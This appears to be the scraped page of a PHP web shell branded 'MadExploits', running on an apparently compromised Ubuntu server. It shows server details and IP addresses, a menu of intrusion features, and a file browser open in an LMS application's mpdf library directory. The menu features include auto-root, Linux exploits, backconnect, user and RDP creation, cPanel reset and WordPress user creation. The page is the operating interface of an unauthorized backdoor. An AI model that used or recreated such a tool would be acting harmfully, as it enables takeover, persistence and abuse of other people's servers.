Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
vendor /
mpdf /
mpdf /
src /
Css /
[ HOME SHELL ]
Name
Size
Permission
Action
Border.php
133
B
-rwxrwxr-x
DefaultCss.php
4.31
KB
-rwxrwxr-x
TextVars.php
403
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TextVars.php
<?php namespace Mpdf\Css; class TextVars { // font-decoration const FD_UNDERLINE = 1; const FD_LINETHROUGH = 2; const FD_OVERLINE = 4; // font-(vertical)-align const FA_SUPERSCRIPT = 8; const FA_SUBSCRIPT = 16; // font-transform const FT_UPPERCASE = 32; const FT_LOWERCASE = 64; const FT_CAPITALIZE = 128; // font-(other)-controls const FC_KERNING = 256; const FC_SMALLCAPS = 512; }
Close